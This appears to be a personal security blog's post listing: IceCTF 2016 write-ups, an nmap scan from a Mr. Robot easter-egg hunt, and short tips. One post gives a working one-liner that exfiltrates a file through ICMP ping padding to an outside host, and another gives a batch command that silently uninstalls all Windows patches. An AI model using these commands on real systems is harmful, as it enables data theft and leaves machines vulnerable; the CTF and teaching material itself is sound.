Posts

  1. IceCTF 2016 - Demo


    Challenge description:

    I found this awesome premium shell, but my demo version just ran out... can you help me crack it? /home/demo/ on the shell. The source for this challenge was provided:

    #define _GNU_SOURCE
    #include <stdio.h>
    #include <stdlib.h>
    #include <unistd.h>
    #include <sys/types.h>
    #include <libgen.h>
    #include <string.h>
    
    void give_shell() {
        gid_t gid = getegid();
        setresgid(gid, gid, gid);
        system("/bin/sh");
    }
    
    int main(int argc, char *argv[]) {
        if(strncmp(basename(getenv("_")), "icesh", 6) == 0){
            give_shell();
        }
        else {
            printf("I'm sorry, your free trial has ended.\n");
        }
        return 0;
    }
    

    So to get the flag we need to make the _ shell variable equal icesh. The _ shell variable in bash is always set to the program name of the command being run. So I decided to use a different shell to see what would happen.

    sh
    ls icesh; /home/demo/demo
    cat flag.txt
    IceCTF{wH0_WoU1d_3vr_7Ru5t_4rgV}
    

    And there we have our flag: IceCTF{wH0_WoU1d_3vr_7Ru5t_4rgV}

  2. IceCTF 2016 - Thor is a hacker now


    Challenge description:

    Thor has been staring at this for hours and he can't make any sense out of it, can you help him figure out what it is?

    The text file provided is just a hexdump produced with xxd. xxd actually has a feature to reverse a hexdump back into the original file, from there I identified the resulting file's format with the file command. It was an lzip. Extracting the lzip resulted in the following image:

    thor

    Flag:

    IceCTF{h3XduMp1N9_l1K3_A_r341_B14Ckh47}

    Commands that were run in order:

    → xxd -r thor.txt > thor.bin
    → file thor.bin
    thor.bin: lzip compressed data, version: 1
    lzip -d thor.bin
    → file thor.bin.out
    thor.bin.out: JPEG image data, JFIF standard 1.01
    → mv thor.bin.out thor.jpg
    
  3. IceCTF 2016 - Vape Nation


    Challenge description:

    Go Green!

    They provide a png called vape_nation.png:

    vape nation

    With the hint I figured it must be a green filter of some sort so I loaded up Stegsolve and checked out the green plane filters. Green plane 0 resulted in the following:

    solved nation

    Looks like a flag :)

    IceCTF{420_CuR35_c4NCEr}

  4. Mr. Robot Season 2 Episode 4 Easter Egg


    After seeing the last Mr. Robot easter egg from season 2 episode 1 I have been on the lookout for IP's and domains to try and go after. At the end of season 2 episode 4 (init_1.asec) Elliot logs into an IRC server and the IP address is clearly visible as 192.251.68.53. ip

    I decided to scan that host with nmap and got the following results:

    → sudo nmap -sS -Pn -sV -n 192.251.68.253
    Starting Nmap 7.12 ( https://nmap.org ) at 2016-07-28 08:46 EDT
    Nmap scan report for 192.251.68.253
    Host is up (0.023s latency).
    Not shown: 996 filtered ports
    PORT     STATE SERVICE     VERSION
    21/tcp   open  ftp?
    80/tcp   open  http-proxy  F5 BIG-IP load balancer http proxy
    554/tcp  open  rtsp?
    7070/tcp open  realserver?
    Service Info: Device: load balancer
    

    HTTP up, cool. I went to the site and it was a fake IRC server with the hostname irc.colo-solutions.net: irc

    After it logged me in as D0loresH4ze I was dropped in a channel called #th3g3ntl3man with the all too familiar samsepi0l (for the uninformed, Sam Sepiol was the alias Elliot used in season one to gain access to Steel Mountain, a secure datacenter).

    After poking around and trying to get samsepi0l to say something besides "i don't have time for this right now." I played the roll of Darlene and entered what she said in the show: input

    Here is the respone I got: response

    they have changed their standard issue. we have a way in.

    What does that even mean? At the end of the episode this line of dialogue was not shown. Only wait for my instructions was. The scene after shows a news article from Business Insider titled FBI gives up Blackberry for Android. I assume that is their "standard issue" and he is going to hack into them via their smartphones. That's a bold move, we'll see how it plays out next week.

    After this I investigated a couple of other addresses I found (192.251.68.240, 104.97.14.93, 192.251.68.249, irc.eversible.co) but none of them turned up anything. I looked at the page source too, hoping to find something hidden in the javascript or HTML. Nothing there either... I guess we will just have to wait and see where this goes! I'll probably take a closer look at this after work, but I thought this would be cool to share now.

  5. Metasploit Workflows and Scripting


    Here is a presentation I gave at GVSU on 7/20/16 about the basics of metasploit and automation using pymetasploit

    The code for autopsexec is not public right now because it is a mess. I'll update this post when I fix it!

  6. Data Exfiltration with Ping


    I was looking around Twitter the other day and someone had posted something similar to this. I don't remember who you are, but this is a neat trick so I wanted to share it. How to exfiltrate data from a network using the padding of ICMP echo request packets.

    Sending data

    base64 important-data.txt | xxd -ps -c 16 | while read i; do ping -c1 -s32 -p $i 8.8.8.8; done
    

    This will base64 encode important-data.txt and then stuff the encoded data 16 bytes at a time into ping.

    Obviously you should change the IP before sending :)

    Receiving data

    You can grab the data off the wire using scapy. Here's a short little script that takes an out file name as the first argument and then an optional interface name to listen on as the second argument.

    That's all for now.

  7. Hello World


    Finally finished this new blog. It's all static now so that's good.

    I was on wordpress before and it was terrible. Hopefully I can put some cool stuff here!

  8. iPhone: Installing apt without a gui


    Usually to get apt you need to launch Cydia. If you only have an ssh connection in and would like apt you can go to http://apt.saurik.com/debs/ and grab berkeleydb_4.6.21-5_iphoneos-arm.deb and apt7_0.7.25.3-8_iphoneos-arm.deb. Scp them over and run dpkg -i apt7_0.7.25.3-8_iphoneos-arm.deb then dpkg -i berkeleydb_4.6.21-5_iphoneos-arm.deb. There you go. You can apt-get all of the things now.

  9. Uninstall all installed windows KB patches in one line of batch


    I was trying to unpatch something to make it vulnerable and I was getting impatient trying to uninstall the correct patch so I got creative and came up with a one liner to uninstall all of them at once. Or at least all of the ones with working uninstallers and don't have other dependencies... The uninstallers are all called spuninst.exe and are somewhere in \\WINDOWS (under a bunch of sub folders that start with $NtUninstall) so I give you the following command:

    for /F %a in ('dir /B /S /A \\WINDOWS ^\| findstr spuninst.exe ^\| findstr NtUninstall') do @(echo %a && %a /quiet /norestart)
    

    Keep running this until it does not print anything and then all of the patches will be gone on reboot. Happy unpatching

    ... bonus

    for /L %b in (0,0,1) do @for /F %a in ('dir /B /S /A \\WINDOWS ^\| findstr spuninst.exe ^\| findstr NtUninstall') do @(echo %a && %a /quiet /norestart)
    

    Just keep running that until the screen is blank